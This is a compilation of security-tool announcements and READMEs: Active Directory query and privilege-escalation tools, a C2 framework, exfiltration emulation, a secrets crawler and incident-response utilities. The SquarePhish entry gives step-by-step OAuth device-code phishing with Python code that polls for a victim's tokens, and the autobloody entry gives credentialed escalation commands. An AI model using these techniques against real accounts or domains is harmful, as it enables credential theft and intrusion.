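As an illustration of the ABUSEEnricher-style lookup, a minimal query against the public MalwareBazaar API might look like the sketch below; the endpoint and fields follow the public abuse.ch API documentation, but verify them before relying on this:

import requests

def bazaar_lookup(sha256):
    # Ask MalwareBazaar for everything it knows about a sample hash.
    resp = requests.post(
        "https://mb-api.abuse.ch/api/v1/",
        data={"query": "get_info", "hash": sha256},
        timeout=10,
    )
    resp.raise_for_status()
    return resp.json()  # aggregated into the Elastic index by the enricher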


Developing Custom Parsers & Enrichers

Subparse's web view was built using Bootstrap for its CSS; this allows any built-in Bootstrap CSS to be used when developing your own custom Parser/Enricher Vue.js files. We have provided an example of each to help you get started, and have implemented a few custom widgets to ease development and promote standardization in the way information is displayed. All Vue.js files are used for dynamically displaying information from the custom Parser/Enricher and serve as templates for the data.

Note: Naming conventions for both class and file names must be strictly adhered to; this is the first thing to check if you run into issues getting your custom Parser/Enricher to execute. The naming convention of your Parser/Enricher must use the same name across all of the files and class names.



Logging

The logger object is a singleton implementation of the default Python logger. For in-depth usage please reference the official documentation. For Subparse, the only logging methods we recommend using are the logging levels for output. These are:

  • debug
  • warning
  • error
  • critical
  • exception
  • log
  • info


ACKNOWLEDGEMENTS

  • This research and all the co-authors have been supported by NSA Grant H98230-20-1-0326.


Cypherhound - Terminal Application That Contains 260+ Neo4j Cyphers For BloodHound Data Sets


A Python3 terminal application that contains 260+ Neo4j cyphers for BloodHound data sets.

Why?

BloodHound is a staple tool for every red teamer. However, there are some negative side effects of its design. I will cover the biggest pain points I've experienced and what this tool aims to address:

  1. My tools think in lists - until my tools parse exported JSON graphs, I need graph results in a line-by-line format .txt file
  2. Copy/pasting graph results - this plays into the first but do we need to explain this one?
  3. Graphs can be too large to draw - the information contained in any graph can aid our goals as the attacker and we need to be able to view all data efficiently
  4. Manually running custom cyphers is time-consuming - let's automate it :)

This tool can also help blue teams reveal detailed information about their Active Directory environments.


Features

Take back control of your BloodHound data with cypherhound!

  • 264 cyphers to date
    • Set cyphers to search based on user input (user, group, and computer-specific)
    • User-defined regex cyphers
  • User-defined exporting of all results
    • Default export will be just end object to be used as target list with tools
    • Raw export option available in grep/cut/awk-friendly format

Installation

Make sure to have python3 installed and run:

python3 -m pip install -r requirements.txt

Usage

Start the program with: python3 cypherhound.py -u <neo4j_username> -p <neo4j_password>

Commands

The full command menu is shown below, followed by a sketch of how such cyphers run against Neo4j:

Command Menu
set - used to set search parameters for cyphers, double/single quotes not required for any sub-commands
    sub-commands
        user - the user to use in user-specific cyphers (MUST include @domain.name)
        group - the group to use in group-specific cyphers (MUST include @domain.name)
        computer - the computer to use in computer-specific cyphers (SHOULD include .domain.name or @domain.name)
        regex - the regex to use in regex-specific cyphers
    example
        set user svc-test@domain.local
        set group domain admins@domain.local
        set computer dc01.domain.local
        set regex .*((?i)web).*
run - used to run cyphers
    parameters
        cypher number - the number of the cypher to run
    example
        run 7
export - used to export cypher results to txt files
    parameters
        cypher number - the number of the cypher to run and then export
        output filename - the name of the output file, extension not needed
        raw - write raw output or just end object (optional)
    example
        export 31 results
        export 42 results2 raw
list - used to show a list of cyphers
    parameters
        list type - the type of cyphers to list (general, user, group, computer, regex, all)
    example
        list general
        list user
        list group
        list computer
        list regex
        list all
q, quit, exit - used to exit the program
clear - used to clear the terminal
help, ? - used to display this help menu
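
Internally, running a numbered cypher amounts to executing a Cypher query through the Neo4j Python driver and printing one end object per line. A minimal sketch follows; the query and group name are illustrative, not one of the tool's 264 cyphers:

from neo4j import GraphDatabase

driver = GraphDatabase.driver("bolt://localhost:7687", auth=("neo4j", "neo4jpass"))
group = "DOMAIN ADMINS@DOMAIN.LOCAL"
query = (
    "MATCH (u:User)-[:MemberOf*1..]->(g:Group {name: $group}) "
    "RETURN u.name AS member"
)
with driver.session() as session:
    for record in session.run(query, group=group):
        print(record["member"])  # line-by-line output, ready for other tools
driver.close()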

Important Notes

  • The program is configured to use the default Neo4j database and URI
  • Built for BloodHound 4.2.0, certain edges will not work for previous versions
  • Windows users must run pip3 install pyreadline3
  • Shortest paths exports are all the same (raw or not) due to their unpredictable number of nodes

Future Goals

  • Add cyphers for Azure edges

Issues and Support

Please be descriptive with any issues you decide to open and if possible provide output (if applicable).



Top 20 Most Popular Hacking Tools in 2022


As in previous years, we have made a ranking of the most popular tools published between January and December 2022.

The tools cover topics such as Phishing, Information Gathering, and Automation Tools, among others.

Without going into further details, we have prepared a useful list of the most popular tools in Kitploit 2022:


  1. Zphisher - Automated Phishing Tool


  2. CiLocks - Android LockScreen Bypass


  3. Arkhota - A Web Brute Forcer For Android


  4. GodGenesis - A Python3 Based C2 Server To Make Life Of Red Teamer A Bit Easier. The Payload Is Capable To Bypass All The Known Antiviruses And Endpoints


  5. AdvPhishing - This Is Advance Phishing Tool! OTP PHISHING


  6. Modded-Ubuntu - Run Ubuntu GUI On Your Termux With Much Features


  7. Android-PIN-Bruteforce - Unlock An Android Phone (Or Device) By Bruteforcing The Lockscreen PIN


  8. Android_Hid - Use Android As Rubber Ducky Against Another Android Device


  9. Cracken - A Fast Password Wordlist Generator, Smartlist Creation And Password Hybrid-Mask Analysis Tool


  10. HackingTool - ALL IN ONE Hacking Tool For Hackers


  11. Arbitrium-RAT - A Cross-Platform, Fully Undetectable Remote Access Trojan, To Control Android, Windows And Linux


  12. Weakpass - Rule-Based Online Generator To Create A Wordlist Based On A Set Of Words


  13. Geowifi - Search WiFi Geolocation Data By BSSID And SSID On Different Public Databases


  14. BITB - Browser In The Browser (BITB) Templates


  15. Blackbird - An OSINT Tool To Search For Accounts By Username In 101 Social Networks


  16. Espoofer - An Email Spoofing Testing Tool That Aims To Bypass SPF/DKIM/DMARC And Forge DKIM Signatures


  17. Pycrypt - Python Based Crypter That Can Bypass Any Kinds Of Antivirus Products


  18. Grafiki - Threat Hunting Tool About Sysmon And Graphs


  19. VLANPWN - VLAN Attacks Toolkit


  20. linWinPwn - A Bash Script That Automates A Number Of Active Directory Enumeration And Vulnerability Checks





Happy New Year wishes the KitPloit team!


Scapy Packet Manipulation Tool 2.5.0

Scapy is a powerful interactive packet manipulation tool, packet generator, network scanner, network discovery tool, and packet sniffer. It provides classes to interactively create packets or sets of packets, manipulate them, send them over the wire, sniff other packets from the wire, match answers and replies, and more. Interaction is provided by the Python interpreter, so Python programming structures can be used (such as variables, loops, and functions). Report modules are possible and easy to make. It is intended to do the same things as ttlscan, nmap, hping, queso, p0f, xprobe, arping, arp-sk, arpspoof, firewalk, irpas, tethereal, tcpdump, etc.

Aftermath - A Free macOS IR Framework


Aftermath is a Swift-based, open-source incident response framework.

Aftermath can be leveraged by defenders in order to collect and subsequently analyze the data from the compromised host. Aftermath can be deployed from an MDM (ideally), but it can also run independently from the infected user's command line.

Aftermath first runs a series of modules for collection. The output will be written either to a location of your choice, via the -o or --output option, or, by default, to the /tmp directory.

Once collection is complete, the final zip/archive file can be pulled from the end user's disk. This file can then be analyzed using the --analyze argument pointed at the archive file. The results of this will be written to the /tmp directory. The administrator can then unzip that analysis directory and see a parsed view of the locally collected databases, a timeline of files with the file creation, last accessed, and last modified dates (where available), and a storyline which includes the file metadata, database changes, and browser information to potentially track down the infection vector.


Build

To build Aftermath locally, clone it from the repository

git clone https://github.com/jamf/aftermath.git

cd into the Aftermath directory

cd <path_to_aftermath_directory>

Build using Xcode

xcodebuild

cd into the Release folder

cd build/Release

Run aftermath

sudo ./aftermath

Usage

Aftermath needs to be root, as well as have full disk access (FDA) in order to run. FDA can be granted to the Terminal application in which it is running.

The default usage of Aftermath runs

sudo ./aftermath

To specify certain options

sudo ./aftermath [option1] [option2]

Examples

sudo ./aftermath -o /Users/user/Desktop --deep
sudo ./aftermath --analyze <path_to_collection_zip>

Releases

There is an Aftermath.pkg available under Releases. This pkg is signed and notarized. It will install the aftermath binary at /usr/local/bin/. This would be the ideal way to deploy via MDM. Since this is installed in bin, you can then run aftermath like

sudo aftermath [option1] [option2]

Uninstall

To uninstall the aftermath binary, run the AftermathUninstaller.pkg from the Releases. This will uninstall the binary and also run aftermath --cleanup to remove aftermath directories. If any aftermath directories reside elsewhere, from use of the --output option, it is the responsibility of the user/admin to remove said directories.

Help Menu

Contributors
  • Stuart Ashenbrenner
  • Jaron Bradley
  • Maggie Zirnhelt
  • Matt Benyo
  • Ferdous Saljooki

Thank You

This project leverages the open source TrueTree project, written and licensed by Jaron Bradley.



Havoc - Modern and malleable post-exploitation command and control framework


Havoc is a modern and malleable post-exploitation command and control framework, created by @C5pider.

Havoc is in an early state of release. Breaking changes may be made to APIs/core structures as the framework matures.


Support

Consider supporting C5pider on Patreon/Github Sponsors. Additional features are planned for supporters in the future, such as custom agents/plugins/commands/etc.

Quick Start

Please see the Wiki for complete documentation.

Havoc works well on Debian 10/11, Ubuntu 20.04/22.04 and Kali Linux. It's recommended to use the latest versions where possible; you'll need a modern version of Qt and Python 3.10.x to avoid build issues.

See the Installation guide in the Wiki for instructions. If you run into issues, check the Known Issues page as well as the open/closed Issues list.


Features

Client

Cross-platform UI written in C++ and Qt

  • Modern, dark theme based on Dracula

Teamserver

Written in Golang

  • Multiplayer
  • Payload generation (exe/shellcode/dll)
  • HTTP/HTTPS listeners
  • Customizable C2 profiles
  • External C2

Demon

Havoc's flagship agent written in C and ASM

  • Sleep Obfuscation via Ekko or FOLIAGE
  • x64 return address spoofing
  • Indirect Syscalls for Nt* APIs
  • SMB support
  • Token vault
  • Variety of built-in post-exploitation commands

Extensibility


Community

You can join the official Havoc Discord to chat with the community!

Contributing

To contribute to the Havoc Framework, please review the guidelines in Contributing.md and then open a pull-request!



OFRAK - Unpack, Modify, And Repack Binaries


OFRAK (Open Firmware Reverse Analysis Konsole) is a binary analysis and modification platform. OFRAK combines the ability to:

  • Identify and Unpack many binary formats
  • Analyze unpacked binaries with field-tested reverse engineering tools
  • Modify and Repack binaries with powerful patching strategies

OFRAK supports a range of embedded firmware file formats beyond userspace executables, including:

  • Compressed filesystems
  • Compressed & checksummed firmware
  • Bootloaders
  • RTOS/OS kernels

OFRAK equips users with the following (a minimal API sketch follows the list):

  • A Graphical User Interface (GUI) for interactive exploration and visualization of binaries
  • A Python API for readable and reproducible scripts that can be applied to entire classes of binaries, rather than just one specific binary
  • Recursive identification, unpacking, and repacking of many file formats, from ELF executables, to filesystem archives, to compressed and checksummed firmware formats
  • Built-in, extensible integration with powerful analysis backends (angr, Binary Ninja, Ghidra, IDA Pro)
  • Extensibility by design via a common interface to easily write additional OFRAK components and add support for a new file format or binary patching operation
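
As a rough illustration of the Python API, a minimal unpack-and-repack sketch is below. The method names follow the project's documented examples from memory and should be verified against the OFRAK docs; firmware.bin is a placeholder input:

from ofrak import OFRAK, OFRAKContext

async def main(ofrak_context: OFRAKContext):
    # Load a binary as the root resource (path is a placeholder).
    resource = await ofrak_context.create_root_resource_from_file("firmware.bin")
    # Recursively identify and unpack nested formats.
    await resource.unpack_recursively()
    # ...analyze or modify child resources here, then repack:
    await resource.pack()
    await resource.flush_data_to_disk("firmware.repacked.bin")  # method name assumed

if __name__ == "__main__":
    OFRAK().run(main)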

See ofrak.com for more details.


GUI Frontend

The web-based GUI view provides a navigable resource tree. For the selected resource, it also provides: metadata, hex or text navigation, and a mini map sidebar for quickly navigating by entropy, byteclass, or magnitude. The GUI also allows for actions normally available through the Python API like commenting, unpacking, analyzing, modifying and packing resources.

Getting Started

OFRAK uses Git LFS. This means that you must have Git LFS installed before you clone the repository! Install Git LFS by following the instructions here. If you accidentally cloned the repository before installing Git LFS, cd into the repository and run git lfs pull.

See docs/environment-setup for detailed instructions on how to install OFRAK.

Documentation

OFRAK has general documentation and API documentation. Both can be viewed at ofrak.com/docs.

If you wish to make changes to the documentation or serve it yourself, follow the directions in docs/README.md.

License

The code in this repository comes with an OFRAK Community License, which is intended for educational uses, personal development, or just having fun.

Users interested in OFRAK for commercial purposes can request the Pro License, which for a limited period is available for a free 6-month trial. See OFRAK Licensing for more information.

Contributing

Red Balloon Security is excited for security researchers and developers to contribute to this repository.

For details, please see our contributor guide and the Python development guide.

Support

Please contact ofrak@redballoonsecurity.com, or write to us on the OFRAK Slack with any questions or issues regarding OFRAK. We look forward to getting your feedback! Sign up for the OFRAK Mailing List to receive monthly updates about OFRAK code improvements and new features.


This material is based in part upon work supported by the DARPA under Contract No. N66001-20-C-4032. Any opinions, findings and conclusions or recommendations expressed in this material are those of the author(s) and do not necessarily reflect the views of the DARPA. Distribution Statement β€œA” (Approved for Public Release, Distribution Unlimited).



Autobloody - Tool To Automatically Exploit Active Directory Privilege Escalation Paths Shown By BloodHound


autobloody is a tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound.

Description

This tool automates AD privesc between two AD objects, the source (the one we own) and the target (the one we want), if a privesc path exists in the BloodHound database. The automation is composed of two steps:

  • Finding the optimal privesc path using BloodHound data and Neo4j queries.
  • Executing the path found using the bloodyAD package.

Because autobloody relies on bloodyAD, it supports authentication using cleartext passwords, pass-the-hash, pass-the-ticket or certificates and binds to LDAP services of a domain controller to perform AD privesc.


Installation

First, if you run it on Linux, you must have libkrb5-dev installed on your OS in order for Kerberos to work:

# Debian/Ubuntu/Kali
apt-get install libkrb5-dev

# Centos/RHEL
yum install krb5-devel

# Fedora
dnf install krb5-devel

# Arch Linux
pacman -S krb5

A python package is available:

pip install autobloody

Or you can clone the repo:

git clone --depth 1 https://github.com/CravateRouge/autobloody
pip install .

Dependencies

  • bloodyAD
  • Neo4j python driver
  • Neo4j with the GDS library
  • BloodHound
  • Python 3
  • Gssapi (linux) or Winkerberos (Windows)

How to use it

First, data must be imported into BloodHound (e.g. using SharpHound or BloodHound.py) and Neo4j must be running.

⚠️
-ds and -dt values are case sensitive

Simple usage:

autobloody -u john.doe -p 'Password123!' --host 192.168.10.2 -dp 'neo4jP@ss' -ds 'JOHN.DOE@BLOODY.LOCAL' -dt 'BLOODY.LOCAL'

Full help:

[bloodyAD]$ ./autobloody.py -h
usage: autobloody.py [-h] [--dburi DBURI] [-du DBUSER] -dp DBPASSWORD -ds DBSOURCE -dt DBTARGET [-d DOMAIN] [-u USERNAME] [-p PASSWORD] [-k] [-c CERTIFICATE] [-s] --host HOST

AD Privesc Automation

options:
-h, --help show this help message and exit
--dburi DBURI The host neo4j is running on (default is "bolt://localhost:7687")
-du DBUSER, --dbuser DBUSER
Neo4j username to use (default is "neo4j")
-dp DBPASSWORD, --dbpassword DBPASSWORD
Neo4j password to use
-ds DBSOURCE, --dbsource DBSOURCE
Case sensitive label of the source node (name property in bloodhound)
-dt DBTARGET, --dbtarget DBTARGET
Case sensitive label of the target node (name property in bloodhound)
-d DOMAIN, --domain DOMAIN
Domain used for NTLM authentication
-u USERNAME, --username USERNAME
Username used for NTLM authentication
-p PASSWORD, --password PASSWORD
Cleartext password or LMHASH:NTHASH for NTLM authentication
-k, --kerberos
-c CERTIFICATE, --certificate CERTIFICATE
Certificate authentication, e.g: "path/to/key:path/to/cert"
-s, --secure Try to use LDAP over TLS aka LDAPS (default is LDAP)
--host HOST Hostname or IP of the DC (ex: my.dc.local or 172.16.1.3)

How it works

First, a privesc path is found using Dijkstra's algorithm as implemented in Neo4j's GDS library. Dijkstra's algorithm solves the shortest-path problem on a weighted graph. By default the edges created by BloodHound don't have a weight but a type (e.g. MemberOf, WriteOwner). A weight is therefore added to each edge according to the type of edge and the type of node reached (e.g. user, group, domain).
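
Conceptually, the weighting-plus-Dijkstra step looks like the sketch below. The weight table is hypothetical, not autobloody's actual values, and the real tool runs this inside Neo4j via GDS rather than in Python:

import heapq

# Hypothetical per-edge-type costs: cheaper edges are "easier" privesc steps.
WEIGHTS = {"MemberOf": 0, "GenericAll": 1, "WriteDacl": 2, "ForceChangePassword": 3}

def dijkstra(graph, source, target):
    # graph maps node -> [(edge_type, neighbour), ...]
    queue, seen = [(0, source, [source])], set()
    while queue:
        cost, node, path = heapq.heappop(queue)
        if node == target:
            return cost, path
        if node in seen:
            continue
        seen.add(node)
        for edge_type, nxt in graph.get(node, []):
            heapq.heappush(queue, (cost + WEIGHTS.get(edge_type, 1), nxt, path + [nxt]))
    return None  # no privesc path exists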

Once a path is generated, autobloody will connect to the DC, execute the path and clean up what is reversible (everything except ForcePasswordChange and setOwner).

Limitations

For now, only the following BloodHound edges are supported for automatic exploitation:

  • MemberOf
  • ForceChangePassword
  • AddMembers
  • AddSelf
  • DCSync
  • GetChanges/GetChangesAll
  • GenericAll
  • WriteDacl
  • GenericWrite
  • WriteOwner
  • Owns
  • Contains
  • AllExtendedRights


GRAudit Grep Auditing Tool 3.5

Graudit is a simple script with signature sets that allows you to find potential security flaws in source code using the GNU utility grep. It's comparable to other static analysis applications like RATS, SWAAT, and flawfinder while keeping the technical requirements to a minimum and being very flexible.

S3Crets_Scanner - Hunting For Secrets Uploaded To Public S3 Buckets


  • S3cret Scanner is a tool designed to provide a complementary layer for the Amazon S3 Security Best Practices by proactively hunting secrets in public S3 buckets.
  • It can be executed as a scheduled task or on demand.

Automation workflow

The automation will perform the following actions (sketched in code after the list):

  1. List the public buckets in the account (set with a public ACL, or where objects can be public)
  2. List the textual or sensitive files (e.g. .p12, .pgp and more)
  3. Download, scan (using truffleHog3) and delete the files from disk, one by one, as each is evaluated
  4. Logs will be written to the logger.log file.
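
A minimal boto3 sketch of steps 1-3, assuming AWS credentials are already configured; the public-ACL check and file filter are simplified compared to the real scanner, and the truffleHog3 invocation is left as a comment:

import boto3

s3 = boto3.client("s3")
for bucket in s3.list_buckets()["Buckets"]:
    name = bucket["Name"]
    acl = s3.get_bucket_acl(Bucket=name)
    is_public = any(
        grant["Grantee"].get("URI", "").endswith(("AllUsers", "AuthenticatedUsers"))
        for grant in acl["Grants"]
    )
    if not is_public:
        continue
    for obj in s3.list_objects_v2(Bucket=name).get("Contents", []):
        if obj["Key"].endswith((".txt", ".csv", ".p12", ".pgp")):
            s3.download_file(name, obj["Key"], "/tmp/candidate")
            # run truffleHog3 against /tmp/candidate here, then delete the file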

Prerequisites

  1. Python 3.6 or above
  2. TruffleHog3 installed in $PATH
  3. An AWS role with the following permissions:
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": [
                "s3:GetLifecycleConfiguration",
                "s3:GetBucketTagging",
                "s3:ListBucket",
                "s3:GetAccelerateConfiguration",
                "s3:GetBucketPolicy",
                "s3:GetBucketPublicAccessBlock",
                "s3:GetBucketPolicyStatus",
                "s3:GetBucketAcl",
                "s3:GetBucketLocation"
            ],
            "Resource": "arn:aws:s3:::*"
        },
        {
            "Sid": "VisualEditor1",
            "Effect": "Allow",
            "Action": "s3:ListAllMyBuckets",
            "Resource": "*"
        }
    ]
}
  4. If you're using a CSV file, make sure to place the file accounts.csv in the csv directory, in the following format:
Account name,Account id
prod,123456789
ci,321654987
dev,148739578

Getting started

Use pip to install the needed requirements.

# Clone the repo
git clone <repo>

# Install requirements
pip3 install -r requirements.txt

# Install trufflehog3
pip3 install trufflehog3

Usage

Argument              Values    Description                                                         Required
-p, --aws_profile               The AWS profile name for the access keys                            βœ“
-r, --scanner_role              The AWS scanner's role name                                         βœ“
-m, --method          internal  The scan type                                                       βœ“
-l, --last_modified   1-365     Number of days to scan since the file was last modified; default 1  βœ—

Usage Examples

python3 main.py -p secTeam -r secteam-inspect-s3-buckets -l 1

Demo


Contributing

Pull requests and forks are welcome. For major changes, please open an issue first to discuss what you would like to change.



NetLlix - A Project Created With An Aim To Emulate And Test Exfiltration Of Data Over Different Network Protocols


A project created with the aim of emulating and testing exfiltration of data over different network protocols. The emulation is performed without the use of native APIs. This will help blue teams write correlation rules to detect any type of C2 communication or data exfiltration.


Currently, this project can help generate HTTP/HTTPS traffic (both GET and POST) using the below-mentioned programming/scripting languages (a plain-socket Python analogue follows the list):

  • CNet/WebClient: Developed in C to generate network traffic using the well-known Win32 APIs (WININET & WINHTTP) and raw socket programming.
  • HashNet/WebClient: A C# binary to generate network traffic using .NET classes like HttpClient and WebRequest, and raw sockets.
  • PowerNet/WebClient: PowerShell scripts to generate network traffic using socket programming.
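
For a language-neutral illustration of the raw-socket approach these clients share, here is a minimal Python equivalent of an HTTP GET over a plain socket; this is not part of the project, which ships C, C# and PowerShell clients:

import socket

def http_get(host, port=80, path="/"):
    # Hand-built HTTP/1.1 request over a plain TCP socket, no HTTP library.
    request = (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Connection: close\r\n\r\n"
    )
    with socket.create_connection((host, port), timeout=10) as sock:
        sock.sendall(request.encode())
        response = b""
        while chunk := sock.recv(4096):
            response += chunk
    return response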

Usage:

Download the latest ZIP from the Releases page.

Running the server:

  • With SSL: python3 HTTP-S-EXFIL.py ssl

  • Without SSL: python3 HTTP-S-EXFIL.py

Running the client:

  • CNet - CNet.exe <Server-IP-ADDRESS> - Select any option
  • HashNet - ChashNet.exe <Server-IP-ADDRESS> - Select any option
  • PowerNet - .\PowerHttp.ps1 -ip <Server-IP-ADDRESS> -port <80/443> -method <GET/POST>


cryptmount Filesystem Manager 6.1.1

cryptmount is a utility for creating and managing secure filing systems on GNU/Linux systems. After initial setup, it allows any user to mount or unmount filesystems on demand, solely by providing the decryption password, with any system devices needed to access the filing system being configured automatically. A wide variety of encryption schemes (provided by the kernel dm-crypt system and the libgcrypt library) can be used to protect both the filesystem and the access key. The protected filing systems can reside in either ordinary files or disk partitions. The package also supports encrypted swap partitions, and automatic configuration on system boot-up.

Squarephish - An advanced phishing tool that uses a technique combining the OAuth Device code authentication flow and QR codes


SquarePhish is an advanced phishing tool that uses a technique combining the OAuth Device code authentication flow and QR codes.

See PhishInSuits for more details on using OAuth Device Code flow for phishing attacks.


_____ _____ _ _ _
/ ____| | __ \| | (_) | |
| (___ __ _ _ _ __ _ _ __ ___| |__) | |__ _ ___| |__
\___ \ / _` | | | |/ _` | '__/ _ \ ___/| '_ \| / __| '_ \
____) | (_| | |_| | (_| | | | __/ | | | | | \__ \ | | |
|_____/ \__, |\__,_|\__,_|_| \___|_| |_| |_|_|___/_| |_|
| |
|_|
_________
| | /(
| O |/ (
|> |\ ( v0.1.0
|_________| \(

usage: squish.py [-h] {email,server} ...

SquarePhish -- v0.1.0

optional arguments:
-h, --help show this help message and exit

modules:
{email,server}
email send a malicious QR Code email to a provided victim
server host a malicious server QR Codes generated via the 'email' module will
point to that will activate the malicious OAuth Device Code flow

Attack Steps

An attacker can use the email module of SquarePhish to send a malicious QR code email to a victim. The default pretext is that the victim is required to update their Microsoft MFA authentication to continue using mobile email. The current client ID in use is the Microsoft Authenticator App.

By sending a QR code first, the attacker can avoid prematurely starting the OAuth Device Code flow that lasts only 15 minutes.

The victim will then scan the QR code found in the email body with their mobile device. The QR code will direct the victim to the attacker-controlled server (running the server module of SquarePhish), with a URL parameter set to their email address.
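
Generating such a QR code is straightforward; a sketch using the third-party qrcode package follows, where the server URL, path and parameter name are placeholders rather than SquarePhish's exact format:

import qrcode  # pip install qrcode[pil] (third-party package)

victim = "minnow@square.phish"
server = "https://squarephish.example"  # attacker-controlled server (placeholder)

# Encode the server URL, tagged with the victim's address, into a QR image
# that can be embedded in the pretext email.
img = qrcode.make(f"{server}/mobile?email={victim}")
img.save("qr.png")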

When the victim visits the malicious SquarePhish server, a background process is triggered that starts the OAuth Device Code authentication flow and emails the victim a generated Device Code, which they are then required to enter into the legitimate Microsoft Device Code website (this starts the OAuth Device Code flow's 15-minute timer).

The SquarePhish server will then continue to poll for authentication in the background.

[2022-04-08 14:31:51,962] [info] [minnow@square.phish] Polling for user authentication...
[2022-04-08 14:31:57,185] [info] [minnow@square.phish] Polling for user authentication...
[2022-04-08 14:32:02,372] [info] [minnow@square.phish] Polling for user authentication...
[2022-04-08 14:32:07,516] [info] [minnow@square.phish] Polling for user authentication...
[2022-04-08 14:32:12,847] [info] [minnow@square.phish] Polling for user authentication...
[2022-04-08 14:32:17,993] [info] [minnow@square.phish] Polling for user authentication...
[2022-04-08 14:32:23,169] [info] [minnow@square.phish] Polling for user authentication...
[2022-04-08 14:32:28,492] [info] [minnow@square.phish] Polling for user authentication...
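
The polling stage mirrors the standard Microsoft OAuth 2.0 device-code flow. A minimal sketch against the public v2.0 endpoints is below; this is not SquarePhish's actual code, and CLIENT_ID is a placeholder:

import time
import requests

CLIENT_ID = "<client-id>"  # e.g. the Microsoft Authenticator app's ID (placeholder)
BASE = "https://login.microsoftonline.com/common/oauth2/v2.0"

# Start the flow: Microsoft returns a device_code, a user_code for the victim,
# and the polling interval. The 15-minute expiry starts here.
dc = requests.post(f"{BASE}/devicecode",
                   data={"client_id": CLIENT_ID,
                         "scope": ".default offline_access profile openid"}).json()
print("Code to send the victim:", dc["user_code"])

while True:
    time.sleep(dc["interval"])
    token = requests.post(f"{BASE}/token",
                          data={"grant_type": "urn:ietf:params:oauth:grant-type:device_code",
                                "client_id": CLIENT_ID,
                                "device_code": dc["device_code"]}).json()
    if "access_token" in token:
        break  # victim authenticated and consented: save the token info
    if token.get("error") != "authorization_pending":
        raise SystemExit(token.get("error"))  # e.g. expired_token after ~15 minutes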

The victim will then visit the Microsoft Device Code authentication site from either the link provided in the email or via a redirect from visiting the SquarePhish URL on their mobile device.

The victim will then enter the provided Device Code and will be prompted for consent.

After the victim authenticates and consents, an authentication token is saved locally and will provide the attacker access via the defined scope of the requesting application.

[2022-04-08 14:32:28,796] [info] [minnow@square.phish] Token info saved to minnow@square.phish.tokeninfo.json

The current scope definition:

"scope": ".default offline_access profile openid"

Usage

!IMPORTANT: Before using either module, update the required information in the settings.config file noted with Required.

Email Module

Send the target victim a generated QR code that will trigger the OAuth Device Code flow.

usage: squish.py email [-h] [-c CONFIG] [--debug] [-e EMAIL]

optional arguments:
-h, --help show this help message and exit

-c CONFIG, --config CONFIG
squarephish config file [Default: settings.config]

--debug enable server debugging

-e EMAIL, --email EMAIL
victim email address to send initial QR code email to

Server Module

Host a server that a generated QR code will be pointed to and when requested will trigger the OAuth Device Code flow.

usage: squish.py server [-h] [-c CONFIG] [--debug]

optional arguments:
-h, --help show this help message and exit

-c CONFIG, --config CONFIG
squarephish config file [Default: settings.config]

--debug enable server debugging

Configuration

All of the applicable settings for execution can be found and modified via the settings.config file. There are several pieces of required information that do not have a default value that must be filled out by the user: SMTP_EMAIL, SMTP_PASSWORD, and SQUAREPHISH_SERVER (only when executing the email module). All configuration options have been documented within the settings file via in-line comments.

Note: The SQUAREPHISH_ values present in the 'EMAIL' section of the configuration should match the values set when running the SquarePhish server.

Custom Pretexts

Currently, the pre-defined pretexts can be found in the pretexts folder.

To write custom pretexts, use the existing template via the pretexts/iphone/ folder. An email template is required for both the initial QR code email and the follow-up device code email.

Important: When writing a custom pretext, note the existence of %s in both pretext templates. This exists to allow SquarePhish to populate the correct data when generating emails (QR code data and/or device code value).

OPSEC

There are several HTTP response headers defined in the utils.py file. These headers are defined to override any existing Flask response header values and to provide a more 'legitimate' response from the server. These header values can be modified, removed and/or additional headers can be included for better OPSEC.

{
"vary": "Accept-Encoding",
"server": "Microsoft-IIS/10.0",
"tls_version": "tls1.3",
"content-type": "text/html; charset=utf-8",
"x-appversion": "1.0.8125.42964",
"x-frame-options": "SAMEORIGIN",
"x-ua-compatible": "IE=Edge;chrome=1",
"x-xss-protection": "1; mode=block",
"x-content-type-options": "nosniff",
"strict-transport-security": "max-age=31536000",
}


GNU Privacy Guard 2.4.0

GnuPG (the GNU Privacy Guard or GPG) is GNU's tool for secure communication and data storage. It can be used to encrypt data and to create digital signatures. It includes an advanced key management facility and is compliant with the proposed OpenPGP Internet standard as described in RFC2440. As such, it is meant to be compatible with PGP from NAI, Inc. Because it does not use any patented algorithms, it can be used without any restrictions.

GNU Privacy Guard 2.2.41

GnuPG (the GNU Privacy Guard or GPG) is GNU's tool for secure communication and data storage. It can be used to encrypt data and to create digital signatures. It includes an advanced key management facility and is compliant with the proposed OpenPGP Internet standard as described in RFC2440. As such, it is meant to be compatible with PGP from NAI, Inc. Because it does not use any patented algorithms, it can be used without any restrictions. This is the LTS release.

HTTPLoot - An Automated Tool Which Can Simultaneously Crawl, Fill Forms, Trigger Error/Debug Pages And "Loot" Secrets Out Of The Client-Facing Code Of Sites


An automated tool which can simultaneously crawl, fill forms, trigger error/debug pages and "loot" secrets out of the client-facing code of sites.


Usage

To use the tool, you can grab any one of the pre-built binaries from the Releases section of the repository. If you want to build the source code yourself, you will need Go > 1.16. Simply running go build will output a usable binary.

Additionally, you will need two JSON files (lootdb.json and regexes.json) along with the binary, which you can get from the repo itself. Once you have all 3 files in the same folder, you can go ahead and fire up the tool.

Video demo:


Here is the help usage of the tool:

$ ./httploot --help
_____
)=(
/ \ H T T P L O O T
( $ ) v0.1
\___/

[+] HTTPLoot by RedHunt Labs - A Modern Attack Surface (ASM) Management Company
[+] Author: Pinaki Mondal (RHL Research Team)
[+] Continuously Track Your Attack Surface using https://redhuntlabs.com/nvadr.

Usage of ./httploot:
-concurrency int
Maximum number of sites to process concurrently (default 100)
-depth int
Maximum depth limit to traverse while crawling (default 3)
-form-length int
Length of the string to be randomly generated for filling form fields (default 5)
-form-string string
Value with which the tool will auto-fill forms, strings will be randomly generated if no value is supplied
-input-file string
Path of the input file containing domains to process
-output-file string
CSV output file path to write the results to (default "httploot-results.csv")
-parallelism int
Number of URLs per site to crawl parallely (default 15)
-submit-forms
Whether to auto-submit forms to trigger debug pages
-timeout int
The default timeout for HTTP requests (default 10)
-user-agent string
User agent to use during HTTP requests (default "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:98.0) Gecko/20100101 Firefox/98.0")
-verify-ssl
Verify SSL certificates while making HTTP requests
-wildcard-crawl
Allow crawling of links outside of the domain being scanned

Concurrent scanning

There are two flags which help with the concurrent scanning:

  • -concurrency: Specifies the maximum number of sites to process concurrently.
